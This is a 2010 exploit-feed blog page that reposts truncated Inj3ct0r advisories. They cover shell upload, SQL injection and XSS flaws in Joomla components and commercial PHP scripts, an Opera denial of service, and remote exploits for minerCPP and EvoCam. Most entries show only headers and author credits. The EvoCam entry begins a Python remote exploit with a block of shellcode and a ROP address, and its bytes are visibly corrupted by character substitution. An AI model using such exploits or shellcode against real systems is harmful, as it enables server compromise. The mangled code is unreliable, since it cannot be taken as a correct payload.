Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for July 6th, 2010

iScripts Socialware Shell upload Vulnerabilty

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>iScripts Socialware Shell upload Vulnerabilty</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================
iScripts Socialware Shell upload Vulnerabilty
=============================================
Name : iScripts Socialware Shell upload Vulnerabilty
Critical Level:VERY HIGH
vendor URL :http://www.iscripts.com/socialware/
Price:$147
Author : ..::[ SONiC ]::.. aka ~the_pshyco~ &lt;sonicdefence[at]gmail.com&gt;
special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,Bunny,Nishi,MA1201,RJ,D3aD F0x
greetz to :www.topsecure.net ,All ICW [...]

Leave a Comment

PG Social Networking Shell upload Vulnerabilty

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PG Social Networking Shell upload Vulnerabilty</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================
PG Social Networking Shell upload Vulnerabilty
==============================================
Name : PG Social Networking –Shell upload Vulnerabilty
Critical Level :VERY HIGH
vendor URL :http://www.datingpro.com/social
Price:$739
Author : ..::[ SONiC ]::.. aka ~the_pshyco~ &lt;sonicdefence[at]gmail.com&gt;
special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,Bunny,Nishi,MA1201,RJ,D3aD F0x
greetz [...]

Leave a Comment

Joomal Jobs Pro Blind Sql injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomal Jobs Pro Blind Sql injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
Joomal Jobs Pro Blind Sql injection Vulnerability
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla Component com_start SQL Injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_start SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================
Joomla Component com_start SQL Injection Vulnerability
======================================================
[~]######################################### InformatioN #############################################[~]
[~] Title : Joomla Component com_start SQL Injection Vulnerability
[~] Author : pr0xy g33k
[~] Homepage : http://www.shkupilive.info
[~] Contact [...]

Leave a Comment

Joomla Component com_leader SQL Injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_leader SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Joomla Component com_leader SQL Injection Vulnerability
=======================================================
[~]######################################### InformatioN #############################################[~]
[~] Title : Joomla Component com_leader SQL Injection Vulnerability
[~] Author : pr0xy g33k
[~] Homepage : http://www.shkupilive.info
[~] Contact [...]

Leave a Comment

Joomla Component com_videos SQL Injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_videos SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Joomla Component com_videos SQL Injection Vulnerability
=======================================================
[~]######################################### InformatioN #############################################[~]
[~] Title : Joomla com_videos SQL Injection Vulnerability
[~] Author : pr0xy g33k
[~] Homepage : http://www.shkupilive.info
[~] Contact [...]

Leave a Comment

Joomla com_jobline Blind SQL Injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla com_jobline Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
Joomla com_jobline Blind SQL Injection Vulnerability
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla com_autartimonial SQL Injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla com_autartimonial SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
Joomla com_autartimonial SQL Injection Vulnerability
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Addiction (index.php) SQL Injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Addiction (index.php) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
Addiction (index.php) SQL Injection Vulnerability
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

MakeMedia (newsdettaglio.php) Blind SQL Injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MakeMedia (newsdettaglio.php) Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
MakeMedia (newsdettaglio.php) Blind SQL Injection Vulnerability
===============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

sLogan (news_details.php) Blind SQL Injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>sLogan (news_details.php) Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================================
sLogan (news_details.php) Blind SQL Injection Vulnerability
===========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Novatek (sezioni.php) SQL Injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Novatek (sezioni.php) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
Novatek (sezioni.php) SQL Injection Vulnerability
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Net:Box CMS (XSS/Blind SQL Injection) Multiple Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Net:Box CMS (XSS/Blind SQL Injection) Multiple Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================
Net:Box CMS (XSS/Blind SQL Injection) Multiple Vulnerability
============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla com_neorecruit Blind Sql injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla com_neorecruit Blind Sql injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Joomla com_neorecruit Blind Sql injection Vulnerability
=======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

PsNews v1.3 SQL Injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PsNews v1.3 SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================
PsNews v1.3 SQL Injection Vulnerability
=======================================
#########################################################################################
# Exploit Title : PsNews Sql Injection Vulnerability
# Date : 6 – 7 – 2010
# Author : S.W.T
# Vendor : http://www.psnews.sourceforge.net
# Version : 1.3
# Tested on : Linux &amp; [...]

Leave a Comment

Sandbox 2.0.3 Multiple Remote Vulnerabilities

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Sandbox 2.0.3 Multiple Remote Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================
Sandbox 2.0.3 Multiple Remote Vulnerabilities
=============================================
Sandbox 2.0.3 Multiple Remote Vulnerabilities
Name Sandbox
Vendor [...]

Leave a Comment

Opera Exploit v10.60 Denial of Service

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Opera Exploit v10.60 Denial of Service</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================
Opera Exploit v10.60 Denial of Service
======================================
# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title:OperaRemote Dos
# Software Link:http://www.opera.com
# Version: v10.60
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()
_____ _____ _ _
| __ / ____| (_) [...]

Leave a Comment

minerCPP 0.4b Remote BOF+Format String Attack Exploit

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>minerCPP 0.4b Remote BOF+Format String Attack Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
minerCPP 0.4b Remote BOF+Format String Attack Exploit
=====================================================
#!/usr/bin/env python
#minerCPP 0.4b Remote BOF+Format String Attack Exploit
#Software Link: http://sourceforge.net/projects/minercpp/
#Author: l3D
#Sites: http://xraysecurity.blogspot.com, http://nullbyte.org.il
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com
#Tested on Windows 7
#In order to make this exploit work you [...]

Leave a Comment

EvoCam Web Server OSX ROP Remote Exploit (Snow Leopard)

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>EvoCam Web Server OSX ROP Remote Exploit (Snow Leopard)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
EvoCam Web Server OSX ROP Remote Exploit (Snow Leopard)
=======================================================
#!/usr/bin/python
# EvoCam Web Server OSX 3.6.6 and 3.6.7
import socket
import struct
SHELL = ( &quot;xdbxd2×29xc9xb1×27xbfxb1xd5xb6xd3xd9×74×24&quot;
&quot;xf4×5ax83xeaxfcx31×7ax14×03×7axa5×37×43xe2&quot;
&quot;x05×2exfcx45xd5×11xadx17×65xf0×80×18×8ax71&quot;
&quot;x64×19×94×75×10xdfxc6×27×70×88xe6xc5×65×14&quot;
&quot;x6fx2axefxb4×3cxfbxa2×04xaaxcexc3×17×4dx83&quot;
&quot;x95×85×21×49xd7xaax33xd0xb5xf8xe5xbex89xe3&quot;
&quot;xc4xbfx98×4fx5fx78×6dxabxdcx6cx8fx08xb1×25&quot;
&quot;xc3×3ex6fx07×63×4cxccx14×9fxb2xa7xebx51×75&quot;
&quot;x17×5cxc2×25×27×67×2fx45xd7×08×93×6bxa2×21&quot;
&quot;x5cx31×81xb2×1fx4cx19xc7×08×80xd9×77×5fxcd&quot;
&quot;xf6×04xf7×79×27×89×6ex14xbexaex21xb8×93×60&quot;
&quot;x72×03xdex01×43xb4xb0×88×47×64×60xd8xd7xd5&quot;
&quot;x30xd9×1ax55×01×26xf4×06×21×6bx75xac&quot; )
WRITEABLE = 0×8fe66448 [...]

Leave a Comment

HYM (news_details.php) SQL Injection Vulnerability

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>HYM (news_details.php) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================
HYM (news_details.php) SQL Injection Vulnerability
==================================================
##############################################################################
# [+]Title: [HYM (news_details.php) SQL Injection Vulnerability]
##############################################################################
# [+] About :
==============================================================================
# Author : GlaDiaT0R
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team : Tunisian Power Team
# Greetz : ALLAH ! , [...]

Leave a Comment